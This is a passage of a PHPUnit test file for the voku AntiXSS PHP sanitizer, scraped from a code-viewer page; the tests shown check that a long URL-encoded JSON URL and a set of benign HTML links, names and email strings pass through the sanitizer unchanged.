|
1
|
|
|
<?php |
|
2
|
|
|
|
|
3
|
|
|
declare(strict_types=1); |
|
4
|
|
|
|
|
5
|
|
|
use voku\helper\AntiXSS; |
|
6
|
|
|
use voku\helper\UTF8; |
|
7
|
|
|
|
|
8
|
|
|
/** |
|
9
|
|
|
* Class XssTest |
|
10
|
|
|
* |
|
11
|
|
|
* @internal |
|
12
|
|
|
*/ |
|
13
|
|
|
final class XssTest extends \PHPUnit\Framework\TestCase |
|
14
|
|
|
{ |
|
15
|
|
|
|
|
16
|
|
|
// INFO: here you can find some more tests |
|
17
|
|
|
// |
|
18
|
|
|
// - https://www.xssposed.org/incidents/ |
|
19
|
|
|
// - http://www.bioinformatics.org/phplabware/internal_utilities/htmLawed/htmLawed_TESTCASE.txt |
|
20
|
|
|
// - http://htmlpurifier.org/live/smoketests/xssAttacks.php |
|
21
|
|
|
// - http://hackingforsecurity.blogspot.de/2013/11/xss-cheat-sheet-huge-list.html |
|
22
|
|
|
|
|
23
|
|
|
/** |
|
24
|
|
|
* @var AntiXSS |
|
25
|
|
|
*/ |
|
26
|
|
|
public $antiXss; |
|
27
|
|
|
|
|
28
|
|
|
protected function setUp() |
|
29
|
|
|
{ |
|
30
|
|
|
$this->antiXss = new AntiXSS(); |
|
31
|
|
|
} |
|
32
|
|
|
|
|
33
|
|
View Code Duplication |
public function testNoXssUrlWithJson() |
|
|
|
|
|
|
34
|
|
|
{ |
|
35
|
|
|
$testArray = [ |
|
36
|
|
|
'http://foo.bar/tpl_preview.php?pid=122&json=%7B%22recipe_id%22%3A-1%2C%22recipe_created%22%3A%22%22%2C%22recipe_title%22%3A%22vxcvxc%22%2C%22recipe_description%22%3A%22%22%2C%22recipe_yield%22%3A0%2C%22recipe_prepare_time%22%3A0%2C%22recipe_image%22%3A%22%22%2C%22recipe_legal%22%3A0%2C%22recipe_live%22%3A0%2C%22recipe_user_guid%22%3A%22%22%2C%22recipe_category_id%22%3A%5B%5D%2C%22recipe_category_name%22%3A%5B%5D%2C%22recipe_variety_id%22%3A%5B%5D%2C%22recipe_variety_name%22%3A%5B%5D%2C%22recipe_tag_id%22%3A%5B%5D%2C%22recipe_tag_name%22%3A%5B%5D%2C%22recipe_instruction_id%22%3A%5B%5D%2C%22recipe_instruction_text%22%3A%5B%5D%2C%22recipe_ingredient_id%22%3A%5B%5D%2C%22recipe_ingredient_name%22%3A%5B%5D%2C%22recipe_ingredient_amount%22%3A%5B%5D%2C%22recipe_ingredient_unit%22%3A%5B%5D%2C%22formMatchingArray%22%3A%7B%22unites%22%3A%5B%22Becher%22%2C%22Beete%22%2C%22Beutel%22%2C%22Blatt%22%2C%22Bl%5Cu00e4tter%22%2C%22Bund%22%2C%22B%5Cu00fcndel%22%2C%22cl%22%2C%22cm%22%2C%22dicke%22%2C%22dl%22%2C%22Dose%22%2C%22Dose%5C%2Fn%22%2C%22d%5Cu00fcnne%22%2C%22Ecke%28n%29%22%2C%22Eimer%22%2C%22einige%22%2C%22einige+Stiele%22%2C%22EL%22%2C%22EL%2C+geh%5Cu00e4uft%22%2C%22EL%2C+gestr.%22%2C%22etwas%22%2C%22evtl.%22%2C%22extra%22%2C%22Fl%5Cu00e4schchen%22%2C%22Flasche%22%2C%22Flaschen%22%2C%22g%22%2C%22Glas%22%2C%22Gl%5Cu00e4ser%22%2C%22gr.+Dose%5C%2Fn%22%2C%22gr.+Fl.%22%2C%22gro%5Cu00dfe%22%2C%22gro%5Cu00dfen%22%2C%22gro%5Cu00dfer%22%2C%22gro%5Cu00dfes%22%2C%22halbe%22%2C%22Halm%28e%29%22%2C%22Handvoll%22%2C%22K%5Cu00e4stchen%22%2C%22kg%22%2C%22kl.+Bund%22%2C%22kl.+Dose%5C%2Fn%22%2C%22kl.+Glas%22%2C%22kl.+Kopf%22%2C%22kl.+Scheibe%28n%29%22%2C%22kl.+St%5Cu00fcck%28e%29%22%2C%22kl.Flasche%5C%2Fn%22%2C%22kleine%22%2C%22kleinen%22%2C%22kleiner%22%2C%22kleines%22%2C%22Knolle%5C%2Fn%22%2C%22Kopf%22%2C%22K%5Cu00f6pfe%22%2C%22K%5Cu00f6rner%22%2C%22Kugel%22%2C%22Kugel%5C%2Fn%22%2C%22Kugeln%22%2C%22Liter%22%2C%22m.-gro%5Cu00dfe%22%2C%22m.-gro%5Cu00dfer%22%2C%22m.-gro%5Cu00dfes%22%2C%22mehr%22%2C%22mg%22%2C%22ml%22%2C%22Msp.%22%2C%22n.+B.%22%2C%22Paar%22%2C%22Paket%22%2C%22Pck.%22%2C%22Pkt.%22%2C%22Platte%5C%2Fn%22%2C%22Port.%22%2C%22Prise%28n%29%22%2C%22Prisen%22%2C%22Prozent+%25%22%2C%22Riegel%22%2C%22Ring%5C%2Fe%22%2C%22Rippe%5C%2Fn%22%2C%22Rolle%28n%29%22%2C%22Sch%5Cu00e4lchen%22%2C%22Scheibe%5C%2Fn%22%2C%22Schuss%22%2C%22Spritzer%22%2C%22Stange%5C%2Fn%22%2C%22St%5Cu00e4ngel%22%2C%22Stiel%5C%2Fe%22%2C%22Stiele%22%2C%22St%5Cu00fcck%28e%29%22%2C%22Tafel%22%2C%22Tafeln%22%2C%22Tasse%22%2C%22Tasse%5C%2Fn%22%2C%22Teil%5C%2Fe%22%2C%22TL%22%2C%22TL+%28geh%5Cu00e4uft%29%22%2C%22TL+%28gestr.%29%22%2C%22Topf%22%2C%22Tropfen%22%2C%22Tube%5C%2Fn%22%2C%22T%5Cu00fcte%5C%2Fn%22%2C%22viel%22%2C%22wenig%22%2C%22W%5Cu00fcrfel%22%2C%22Wurzel%22%2C%22Wurzel%5C%2Fn%22%2C%22Zehe%5C%2Fn%22%2C%22Zweig%5C%2Fe%22%5D%2C%22yield%22%3A%7B%221%22%3A%221+Portion%22%2C%222%22%3A%222+Portionen%22%2C%223%22%3A%223+Portionen%22%2C%224%22%3A%224+Portionen%22%2C%225%22%3A%225+Portionen%22%2C%226%22%3A%226+Portionen%22%2C%227%22%3A%227+Portionen%22%2C%228%22%3A%228+Portionen%22%2C%229%22%3A%229+Portionen%22%2C%2210%22%3A%2210+Portionen%22%2C%2211%22%3A%2211+Portionen%22%2C%2212%22%3A%2212+Portionen%22%7D%2C%22prepare_time%22%3A%7B%221%22%3A%22schnell%22%2C%222%22%3A%22mittel%22%2C%223%22%3A%22aufwendig%22%7D%2C%22category%22%3A%7B%221%22%3A%22Vorspeise%22%2C%222%22%3A%22Suppe%22%2C%223%22%3A%22Salat%22%2C%224%22%3A%22Hauptspeise%22%2C%225%22%3A%22Beilage%22%2C%226%22%3A%22Nachtisch%5C%2FDessert%22%2C%227%22%3A%22Getr%5Cu00e4nke%22%2C%228%22%3A%22B%5Cu00fcffet%22%2C%229%22%3A%22Fr%5Cu00fchst%5Cu00fcck%5C%2FBrunch%22%7D%2C%22variety%22%3A%7B%221%22%3A%22Basmati+Reis%22%2C%222%22%3A%22Basmati+%26amp%3B+Wild+Reis%22%2C%223%22%3A%22R%5Cu00e4ucherreis%22%2C%224%22%3A%22Jasmin+Reis%22%2C%225%22%3A%221121+Basmati+Wunderreis%22%2C%226%22%3A%22Spitzen+Langkorn+Reis%22%2C%227%22%3A%22Wildreis%22%2C%228%22%3A%22Naturreis%22%2C%229%22%3A%22Sushi+Reis%22%7D%2C%22tag--ingredient%22%3A%7B%221%22%3A%22Eier%22%2C%222%22%3A%22Gem%5Cu00fcse%22%2C%223%22%3A%22Getreide%22%2C%224%22%3A%22Fisch%22%2C%225%22%3A%22Fleisch%22%2C%226%22%3A%22Meeresfr%5Cu00fcchte%22%2C%227%22%3A%22Milchprodukte%22%2C%228%22%3A%22Obst%22%2C%229%22%3A%22Salat%22%7D%2C%22tag--preparation%22%3A%7B%2210%22%3A%22Backen%22%2C%2211%22%3A%22Blanchieren%22%2C%2212%22%3A%22Braten%5C%2FSchmoren%22%2C%2213%22%3A%22D%5Cu00e4mpfen%5C%2FD%5Cu00fcnsten%22%2C%2214%22%3A%22Einmachen%22%2C%2215%22%3A%22Frittieren%22%2C%2216%22%3A%22Gratinieren%5C%2F%5Cu00dcberbacken%22%2C%2217%22%3A%22Grillen%22%2C%2218%22%3A%22Kochen%22%7D%2C%22tag--kitchen%22%3A%7B%2219%22%3A%22Afrikanisch%22%2C%2220%22%3A%22Alpenk%5Cu00fcche%22%2C%2221%22%3A%22Asiatisch%22%2C%2222%22%3A%22Deutsch+%28regional%29%22%2C%2223%22%3A%22Franz%5Cu00f6sisch%22%2C%2224%22%3A%22Mediterran%22%2C%2225%22%3A%22Orientalisch%22%2C%2226%22%3A%22Osteurop%5Cu00e4isch%22%2C%2227%22%3A%22Skandinavisch%22%2C%2228%22%3A%22S%5Cu00fcdamerikanisch%22%2C%2229%22%3A%22US-Amerikanisch%22%2C%2230%22%3A%22%22%7D%2C%22tag--difficulty%22%3A%7B%2231%22%3A%22Einfach%22%2C%2232%22%3A%22Mittelschwer%22%2C%2233%22%3A%22Anspruchsvoll%22%7D%2C%22tag--feature%22%3A%7B%2234%22%3A%22Gut+vorzubereiten%22%2C%2235%22%3A%22Kalorienarm+%5C%2F+leicht%22%2C%2236%22%3A%22Klassiker%22%2C%2237%22%3A%22Preiswert%22%2C%2238%22%3A%22Raffiniert%22%2C%2239%22%3A%22Vegetarisch+%5C%2F+Vegan%22%2C%2240%22%3A%22Vitaminreich%22%2C%2241%22%3A%22Vollwert%22%2C%2242%22%3A%22%22%7D%2C%22tag%22%3A%7B%221%22%3A%22Eier%22%2C%222%22%3A%22Gem%5Cu00fcse%22%2C%223%22%3A%22Getreide%22%2C%224%22%3A%22Fisch%22%2C%225%22%3A%22Fleisch%22%2C%226%22%3A%22Meeresfr%5Cu00fcchte%22%2C%227%22%3A%22Milchprodukte%22%2C%228%22%3A%22Obst%22%2C%229%22%3A%22Salat%22%2C%2210%22%3A%22Backen%22%2C%2211%22%3A%22Blanchieren%22%2C%2212%22%3A%22Braten%5C%2FSchmoren%22%2C%2213%22%3A%22D%5Cu00e4mpfen%5C%2FD%5Cu00fcnsten%22%2C%2214%22%3A%22Einmachen%22%2C%2215%22%3A%22Frittieren%22%2C%2216%22%3A%22Gratinieren%5C%2F%5Cu00dcberbacken%22%2C%2217%22%3A%22Grillen%22%2C%2218%22%3A%22Kochen%22%2C%2219%22%3A%22Afrikanisch%22%2C%2220%22%3A%22Alpenk%5Cu00fcche%22%2C%2221%22%3A%22Asiatisch%22%2C%2222%22%3A%22Deutsch+%28regional%29%22%2C%2223%22%3A%22Franz%5Cu00f6sisch%22%2C%2224%22%3A%22Mediterran%22%2C%2225%22%3A%22Orientalisch%22%2C%2226%22%3A%22Osteurop%5Cu00e4isch%22%2C%2227%22%3A%22Skandinavisch%22%2C%2228%22%3A%22S%5Cu00fcdamerikanisch%22%2C%2229%22%3A%22US-Amerikanisch%22%2C%2230%22%3A%22%22%2C%2231%22%3A%22Einfach%22%2C%2232%22%3A%22Mittelschwer%22%2C%2233%22%3A%22Anspruchsvoll%22%2C%2234%22%3A%22Gut+vorzubereiten%22%2C%2235%22%3A%22Kalorienarm+%5C%2F+leicht%22%2C%2236%22%3A%22Klassiker%22%2C%2237%22%3A%22Preiswert%22%2C%2238%22%3A%22Raffiniert%22%2C%2239%22%3A%22Vegetarisch+%5C%2F+Vegan%22%2C%2240%22%3A%22Vitaminreich%22%2C%2241%22%3A%22Vollwert%22%2C%2242%22%3A%22%22%7D%7D%2C%22errorArray%22%3A%7B%22recipe_prepare_time%22%3A%22error%22%2C%22recipe_yield%22%3A%22error%22%2C%22recipe_category_name%22%3A%22error%22%2C%22recipe_tag_name%22%3A%22error%22%2C%22recipe_instruction_text%22%3A%22error%22%2C%22recipe_ingredient_name%22%3A%22error%22%7D%2C%22errorMessage%22%3A%22Bitte+f%5Cu00fclle+die+rot+markierten+Felder+korrekt+aus.%22%2C%22db%22%3A%7B%22query_count%22%3A20%7D%7D' => 'http://foo.bar/tpl_preview.php?pid=122&json=%7B%22recipe_id%22%3A-1%2C%22recipe_created%22%3A%22%22%2C%22recipe_title%22%3A%22vxcvxc%22%2C%22recipe_description%22%3A%22%22%2C%22recipe_yield%22%3A0%2C%22recipe_prepare_time%22%3A0%2C%22recipe_image%22%3A%22%22%2C%22recipe_legal%22%3A0%2C%22recipe_live%22%3A0%2C%22recipe_user_guid%22%3A%22%22%2C%22recipe_category_id%22%3A%5B%5D%2C%22recipe_category_name%22%3A%5B%5D%2C%22recipe_variety_id%22%3A%5B%5D%2C%22recipe_variety_name%22%3A%5B%5D%2C%22recipe_tag_id%22%3A%5B%5D%2C%22recipe_tag_name%22%3A%5B%5D%2C%22recipe_instruction_id%22%3A%5B%5D%2C%22recipe_instruction_text%22%3A%5B%5D%2C%22recipe_ingredient_id%22%3A%5B%5D%2C%22recipe_ingredient_name%22%3A%5B%5D%2C%22recipe_ingredient_amount%22%3A%5B%5D%2C%22recipe_ingredient_unit%22%3A%5B%5D%2C%22formMatchingArray%22%3A%7B%22unites%22%3A%5B%22Becher%22%2C%22Beete%22%2C%22Beutel%22%2C%22Blatt%22%2C%22Bl%5Cu00e4tter%22%2C%22Bund%22%2C%22B%5Cu00fcndel%22%2C%22cl%22%2C%22cm%22%2C%22dicke%22%2C%22dl%22%2C%22Dose%22%2C%22Dose%5C%2Fn%22%2C%22d%5Cu00fcnne%22%2C%22Ecke%28n%29%22%2C%22Eimer%22%2C%22einige%22%2C%22einige+Stiele%22%2C%22EL%22%2C%22EL%2C+geh%5Cu00e4uft%22%2C%22EL%2C+gestr.%22%2C%22etwas%22%2C%22evtl.%22%2C%22extra%22%2C%22Fl%5Cu00e4schchen%22%2C%22Flasche%22%2C%22Flaschen%22%2C%22g%22%2C%22Glas%22%2C%22Gl%5Cu00e4ser%22%2C%22gr.+Dose%5C%2Fn%22%2C%22gr.+Fl.%22%2C%22gro%5Cu00dfe%22%2C%22gro%5Cu00dfen%22%2C%22gro%5Cu00dfer%22%2C%22gro%5Cu00dfes%22%2C%22halbe%22%2C%22Halm%28e%29%22%2C%22Handvoll%22%2C%22K%5Cu00e4stchen%22%2C%22kg%22%2C%22kl.+Bund%22%2C%22kl.+Dose%5C%2Fn%22%2C%22kl.+Glas%22%2C%22kl.+Kopf%22%2C%22kl.+Scheibe%28n%29%22%2C%22kl.+St%5Cu00fcck%28e%29%22%2C%22kl.Flasche%5C%2Fn%22%2C%22kleine%22%2C%22kleinen%22%2C%22kleiner%22%2C%22kleines%22%2C%22Knolle%5C%2Fn%22%2C%22Kopf%22%2C%22K%5Cu00f6pfe%22%2C%22K%5Cu00f6rner%22%2C%22Kugel%22%2C%22Kugel%5C%2Fn%22%2C%22Kugeln%22%2C%22Liter%22%2C%22m.-gro%5Cu00dfe%22%2C%22m.-gro%5Cu00dfer%22%2C%22m.-gro%5Cu00dfes%22%2C%22mehr%22%2C%22mg%22%2C%22ml%22%2C%22Msp.%22%2C%22n.+B.%22%2C%22Paar%22%2C%22Paket%22%2C%22Pck.%22%2C%22Pkt.%22%2C%22Platte%5C%2Fn%22%2C%22Port.%22%2C%22Prise%28n%29%22%2C%22Prisen%22%2C%22Prozent+%25%22%2C%22Riegel%22%2C%22Ring%5C%2Fe%22%2C%22Rippe%5C%2Fn%22%2C%22Rolle%28n%29%22%2C%22Sch%5Cu00e4lchen%22%2C%22Scheibe%5C%2Fn%22%2C%22Schuss%22%2C%22Spritzer%22%2C%22Stange%5C%2Fn%22%2C%22St%5Cu00e4ngel%22%2C%22Stiel%5C%2Fe%22%2C%22Stiele%22%2C%22St%5Cu00fcck%28e%29%22%2C%22Tafel%22%2C%22Tafeln%22%2C%22Tasse%22%2C%22Tasse%5C%2Fn%22%2C%22Teil%5C%2Fe%22%2C%22TL%22%2C%22TL+%28geh%5Cu00e4uft%29%22%2C%22TL+%28gestr.%29%22%2C%22Topf%22%2C%22Tropfen%22%2C%22Tube%5C%2Fn%22%2C%22T%5Cu00fcte%5C%2Fn%22%2C%22viel%22%2C%22wenig%22%2C%22W%5Cu00fcrfel%22%2C%22Wurzel%22%2C%22Wurzel%5C%2Fn%22%2C%22Zehe%5C%2Fn%22%2C%22Zweig%5C%2Fe%22%5D%2C%22yield%22%3A%7B%221%22%3A%221+Portion%22%2C%222%22%3A%222+Portionen%22%2C%223%22%3A%223+Portionen%22%2C%224%22%3A%224+Portionen%22%2C%225%22%3A%225+Portionen%22%2C%226%22%3A%226+Portionen%22%2C%227%22%3A%227+Portionen%22%2C%228%22%3A%228+Portionen%22%2C%229%22%3A%229+Portionen%22%2C%2210%22%3A%2210+Portionen%22%2C%2211%22%3A%2211+Portionen%22%2C%2212%22%3A%2212+Portionen%22%7D%2C%22prepare_time%22%3A%7B%221%22%3A%22schnell%22%2C%222%22%3A%22mittel%22%2C%223%22%3A%22aufwendig%22%7D%2C%22category%22%3A%7B%221%22%3A%22Vorspeise%22%2C%222%22%3A%22Suppe%22%2C%223%22%3A%22Salat%22%2C%224%22%3A%22Hauptspeise%22%2C%225%22%3A%22Beilage%22%2C%226%22%3A%22Nachtisch%5C%2FDessert%22%2C%227%22%3A%22Getr%5Cu00e4nke%22%2C%228%22%3A%22B%5Cu00fcffet%22%2C%229%22%3A%22Fr%5Cu00fchst%5Cu00fcck%5C%2FBrunch%22%7D%2C%22variety%22%3A%7B%221%22%3A%22Basmati+Reis%22%2C%222%22%3A%22Basmati+%26amp%3B+Wild+Reis%22%2C%223%22%3A%22R%5Cu00e4ucherreis%22%2C%224%22%3A%22Jasmin+Reis%22%2C%225%22%3A%221121+Basmati+Wunderreis%22%2C%226%22%3A%22Spitzen+Langkorn+Reis%22%2C%227%22%3A%22Wildreis%22%2C%228%22%3A%22Naturreis%22%2C%229%22%3A%22Sushi+Reis%22%7D%2C%22tag--ingredient%22%3A%7B%221%22%3A%22Eier%22%2C%222%22%3A%22Gem%5Cu00fcse%22%2C%223%22%3A%22Getreide%22%2C%224%22%3A%22Fisch%22%2C%225%22%3A%22Fleisch%22%2C%226%22%3A%22Meeresfr%5Cu00fcchte%22%2C%227%22%3A%22Milchprodukte%22%2C%228%22%3A%22Obst%22%2C%229%22%3A%22Salat%22%7D%2C%22tag--preparation%22%3A%7B%2210%22%3A%22Backen%22%2C%2211%22%3A%22Blanchieren%22%2C%2212%22%3A%22Braten%5C%2FSchmoren%22%2C%2213%22%3A%22D%5Cu00e4mpfen%5C%2FD%5Cu00fcnsten%22%2C%2214%22%3A%22Einmachen%22%2C%2215%22%3A%22Frittieren%22%2C%2216%22%3A%22Gratinieren%5C%2F%5Cu00dcberbacken%22%2C%2217%22%3A%22Grillen%22%2C%2218%22%3A%22Kochen%22%7D%2C%22tag--kitchen%22%3A%7B%2219%22%3A%22Afrikanisch%22%2C%2220%22%3A%22Alpenk%5Cu00fcche%22%2C%2221%22%3A%22Asiatisch%22%2C%2222%22%3A%22Deutsch+%28regional%29%22%2C%2223%22%3A%22Franz%5Cu00f6sisch%22%2C%2224%22%3A%22Mediterran%22%2C%2225%22%3A%22Orientalisch%22%2C%2226%22%3A%22Osteurop%5Cu00e4isch%22%2C%2227%22%3A%22Skandinavisch%22%2C%2228%22%3A%22S%5Cu00fcdamerikanisch%22%2C%2229%22%3A%22US-Amerikanisch%22%2C%2230%22%3A%22%22%7D%2C%22tag--difficulty%22%3A%7B%2231%22%3A%22Einfach%22%2C%2232%22%3A%22Mittelschwer%22%2C%2233%22%3A%22Anspruchsvoll%22%7D%2C%22tag--feature%22%3A%7B%2234%22%3A%22Gut+vorzubereiten%22%2C%2235%22%3A%22Kalorienarm+%5C%2F+leicht%22%2C%2236%22%3A%22Klassiker%22%2C%2237%22%3A%22Preiswert%22%2C%2238%22%3A%22Raffiniert%22%2C%2239%22%3A%22Vegetarisch+%5C%2F+Vegan%22%2C%2240%22%3A%22Vitaminreich%22%2C%2241%22%3A%22Vollwert%22%2C%2242%22%3A%22%22%7D%2C%22tag%22%3A%7B%221%22%3A%22Eier%22%2C%222%22%3A%22Gem%5Cu00fcse%22%2C%223%22%3A%22Getreide%22%2C%224%22%3A%22Fisch%22%2C%225%22%3A%22Fleisch%22%2C%226%22%3A%22Meeresfr%5Cu00fcchte%22%2C%227%22%3A%22Milchprodukte%22%2C%228%22%3A%22Obst%22%2C%229%22%3A%22Salat%22%2C%2210%22%3A%22Backen%22%2C%2211%22%3A%22Blanchieren%22%2C%2212%22%3A%22Braten%5C%2FSchmoren%22%2C%2213%22%3A%22D%5Cu00e4mpfen%5C%2FD%5Cu00fcnsten%22%2C%2214%22%3A%22Einmachen%22%2C%2215%22%3A%22Frittieren%22%2C%2216%22%3A%22Gratinieren%5C%2F%5Cu00dcberbacken%22%2C%2217%22%3A%22Grillen%22%2C%2218%22%3A%22Kochen%22%2C%2219%22%3A%22Afrikanisch%22%2C%2220%22%3A%22Alpenk%5Cu00fcche%22%2C%2221%22%3A%22Asiatisch%22%2C%2222%22%3A%22Deutsch+%28regional%29%22%2C%2223%22%3A%22Franz%5Cu00f6sisch%22%2C%2224%22%3A%22Mediterran%22%2C%2225%22%3A%22Orientalisch%22%2C%2226%22%3A%22Osteurop%5Cu00e4isch%22%2C%2227%22%3A%22Skandinavisch%22%2C%2228%22%3A%22S%5Cu00fcdamerikanisch%22%2C%2229%22%3A%22US-Amerikanisch%22%2C%2230%22%3A%22%22%2C%2231%22%3A%22Einfach%22%2C%2232%22%3A%22Mittelschwer%22%2C%2233%22%3A%22Anspruchsvoll%22%2C%2234%22%3A%22Gut+vorzubereiten%22%2C%2235%22%3A%22Kalorienarm+%5C%2F+leicht%22%2C%2236%22%3A%22Klassiker%22%2C%2237%22%3A%22Preiswert%22%2C%2238%22%3A%22Raffiniert%22%2C%2239%22%3A%22Vegetarisch+%5C%2F+Vegan%22%2C%2240%22%3A%22Vitaminreich%22%2C%2241%22%3A%22Vollwert%22%2C%2242%22%3A%22%22%7D%7D%2C%22errorArray%22%3A%7B%22recipe_prepare_time%22%3A%22error%22%2C%22recipe_yield%22%3A%22error%22%2C%22recipe_category_name%22%3A%22error%22%2C%22recipe_tag_name%22%3A%22error%22%2C%22recipe_instruction_text%22%3A%22error%22%2C%22recipe_ingredient_name%22%3A%22error%22%7D%2C%22errorMessage%22%3A%22Bitte+f%5Cu00fclle+die+rot+markierten+Felder+korrekt+aus.%22%2C%22db%22%3A%7B%22query_count%22%3A20%7D%7D', |
|
37
|
|
|
]; |
|
38
|
|
|
|
|
39
|
|
|
foreach ($testArray as $before => $after) { |
|
40
|
|
|
static::assertSame($after, $this->antiXss->xss_clean($before), 'testing: ' . $before); |
|
41
|
|
|
} |
|
42
|
|
|
} |
|
43
|
|
|
|
|
44
|
|
|
public function testNoXss() |
|
45
|
|
|
{ |
|
46
|
|
|
$testArray = [ |
|
47
|
|
|
'<nav class="top-bar" data-topbar data-options="back_text: Zurück"><ul><li>foo</li><li>bar</li></ul></nav>' => '<nav class="top-bar" data-topbar data-options="back_text: Zurück"><ul><li>foo</li><li>bar</li></ul></nav>', |
|
48
|
|
|
'<a href="http://suckup.de/about">About</a>' => '<a href="http://suckup.de/about">About</a>', |
|
49
|
|
|
"<a href='http://suckup.de/about'>About</a>" => "<a href='http://suckup.de/about'>About</a>", |
|
50
|
|
|
'<a href="http://moelleken.org/Kontakt/" class="mail"><i class="fa fa-envelope fa-3x"></i></a>' => '<a href="http://moelleken.org/Kontakt/" class="mail"><i class="fa fa-envelope fa-3x"></i></a>', |
|
51
|
|
|
'<a href="https://plus.google.com/u/0/115714615799970937533/about" rel="me" title="Add Me To Your Circle"><i class="fa fa-google-plus fa-3x"></i></a>' => '<a href="https://plus.google.com/u/0/115714615799970937533/about" rel="me" title="Add Me To Your Circle"><i class="fa fa-google-plus fa-3x"></i></a>', |
|
52
|
|
|
'eval is evil and xss is bad, but this is only a string : ...' => 'eval is evil and xss is bad, but this is only a string : ...', |
|
53
|
|
|
'<a href="https://test.com?lall=123&lall=312">test&</a>' => '<a href="https://test.com?lall=123&lall=312">test&</a>', |
|
54
|
|
|
'<a href="https://test.com?lall=123&lall=312">test&</a>' => '<a href="https://test.com?lall=123&lall=312">test&</a>', |
|
55
|
|
|
'<a href="https://test.com?lall=123&lall=312&lall=999">test&</a>' => '<a href="https://test.com?lall=123&lall=312&lall=999">test&</a>', |
|
56
|
|
|
'<p><h1><a href="https://mbd.baidu.com/newspage/data/landingsuper?context=%7B%22nid%22%3A%22news_15446515888862039806%22%7D&n_type=0&p_from=1" target="_blank">Special url</a></h1> User content %7B%7B Test 123</p>' => '<p><h1><a href="https://mbd.baidu.com/newspage/data/landingsuper?context=%7B%22nid%22%3A%22news_15446515888862039806%22%7D&n_type=0&p_from=1" target="_blank">Special url</a></h1> User content %7B%7B Test 123</p>', |
|
57
|
|
|
'<a href="https://mbd.baidu.com/newspage/data/landingsuper?context=%7B%22nid%22%3A%22news_15446515888862039806%22%7D&n_type=0&p_from=1" target="_blank">Valid Link</a>' => '<a href="https://mbd.baidu.com/newspage/data/landingsuper?context=%7B%22nid%22%3A%22news_15446515888862039806%22%7D&n_type=0&p_from=1" target="_blank">Valid Link</a>', |
|
58
|
|
|
'<a href="https://mbd.baidu.com/newspage/data/landingsuper?context=%7B%22nid%22%3A%22news_15446515888862039806%22%7D&n_type=0&p_from=1" target="_blank">Valid Link</a>' => '<a href="https://mbd.baidu.com/newspage/data/landingsuper?context=%7B%22nid%22%3A%22news_15446515888862039806%22%7D&n_type=0&p_from=1" target="_blank">Valid Link</a>', |
|
59
|
|
|
'' => '', |
|
60
|
|
|
' ' => ' ', |
|
61
|
|
|
null => '', |
|
62
|
|
|
true => 1, |
|
63
|
|
|
false => 0, |
|
64
|
|
|
0 => 0, |
|
65
|
|
|
'0.0' => '0.0', |
|
66
|
|
|
'GOM-KC-350+550' => 'GOM-KC-350+550', |
|
67
|
|
|
'Chassis+FanTray10G-VSS' => 'Chassis+FanTray10G-VSS', // issue #34 |
|
68
|
|
|
'3+ years of experience' => '3+ years of experience', |
|
69
|
|
|
' foo ' . "\xe2\x80\xa8" . ' öäü' . "\xe2\x80\xa9" => ' foo ' . "\xe2\x80\xa8" . ' öäü' . "\xe2\x80\xa9", |
|
70
|
|
|
" foo\t foo " => ' foo foo ', |
|
71
|
|
|
'a="get";' => 'a="get";', |
|
72
|
|
|
'<x 1=">" onxxx=1 (text outside tag)' => '<x 1=">" onxxx=1 (text outside tag)', |
|
73
|
|
|
'<a href="https://url.com" target="_blank" style="color: rgb(0, 161, 222);">Click Here for the 2017 Summit Review</a>' => '<a href="https://url.com" target="_blank" style="color: rgb(0, 161, 222);">Click Here for the 2017 Summit Review</a>', |
|
74
|
|
|
'<a href="https://url.com" target="_blank">Click Here for the 2017 Summit Review</a>' => '<a href="https://url.com" target="_blank">Click Here for the 2017 Summit Review</a>', |
|
75
|
|
|
'foo Mondragon bar' => 'foo Mondragon bar', |
|
76
|
|
|
'Mondragon' => 'Mondragon', |
|
77
|
|
|
'Mondragßon' => 'Mondragßon', |
|
78
|
|
|
'MONDRAGÓN' => 'MONDRAGÓN', |
|
79
|
|
|
'MONDRAGÓN ' => 'MONDRAGÓN ', |
|
80
|
|
|
' MONDRAGÓN' => ' MONDRAGÓN', |
|
81
|
|
|
' MONDRAGÓN ' => ' MONDRAGÓN ', |
|
82
|
|
|
'!MONDRAGÓN!' => '!MONDRAGÓN!', |
|
83
|
|
|
'!MONDRAGÓN' => '!MONDRAGÓN', |
|
84
|
|
|
'MONDRAGÓN!' => 'MONDRAGÓN!', |
|
85
|
|
|
'alert || document || write || Mondragon' => 'alert || document || write || Mondragon', |
|
86
|
|
|
'DE VAL HERNANDEZ || DE VAL LOPEZ' => 'DE VAL HERNANDEZ || DE VAL LOPEZ', |
|
87
|
|
|
' foobar DE VAL HERNANDEZ foo bar ' => ' foobar DE VAL HERNANDEZ foo bar ', |
|
88
|
|
|
'ANAMNESI E VAL.DEFINITE BREVI ORTO' => 'ANAMNESI E VAL.DEFINITE BREVI ORTO', |
|
89
|
|
|
'ANAMNESI E VAL!DEFINITE BREVI ORTO' => 'ANAMNESI E VAL!DEFINITE BREVI ORTO', |
|
90
|
|
|
'ANAMNESI E VAL?DEFINITE BREVI ORTO' => 'ANAMNESI E VAL?DEFINITE BREVI ORTO', |
|
91
|
|
|
'ANAMNESI E VAL DEFINITE BREVI ORTO' => 'ANAMNESI E VAL DEFINITE BREVI ORTO', |
|
92
|
|
|
'ANAMNESI E VALDEFINITE BREVI ORTO' => 'ANAMNESI E VALDEFINITE BREVI ORTO', |
|
93
|
|
|
'<[email protected]>' => '<[email protected]>', |
|
94
|
|
|
'[email protected]' => '[email protected]', |
|
95
|
|
|
'<[email protected]>' => '<[email protected]>', |
|
96
|
|
|
'<[email protected]>' => '<[email protected]>', |
|
97
|
|
|
'<[email protected]>' => '<[email protected]>', |
|
98
|
|
|
'[email protected]' => '[email protected]', |
|
99
|
|
|
' [email protected] ' => ' [email protected] ', |
|
100
|
|
|
'cyyhqLRMvBs:APA91bH1ueQlBr8GXbQxNw9SpzldRAeYK4mw-Yqhw44v7oEoRgxyoFAfQc_2A3dc6X_vp3HpmPGh4NAItAAyv9pvoQbJZXUotjX0427y1hG_vCtr34UnEecqAGsXwkevitdHZIp9juRC' => 'cyyhqLRMvBs:APA91bH1ueQlBr8GXbQxNw9SpzldRAeYK4mw-Yqhw44v7oEoRgxyoFAfQc_2A3dc6X_vp3HpmPGh4NAItAAyv9pvoQbJZXUotjX0427y1hG_vCtr34UnEecqAGsXwkevitdHZIp9juRC', |
|
101
|
|
|
'product/category%bf%27' => 'product/category%bf%27', |
|
102
|
|
|
'product/category%0b' . "\0" => 'product/category%0b' . "\0", |
|
103
|
|
|
'foo --> bar' => 'foo --> bar', |
|
104
|
|
|
'onendsomething' => 'onendsomething', |
|
105
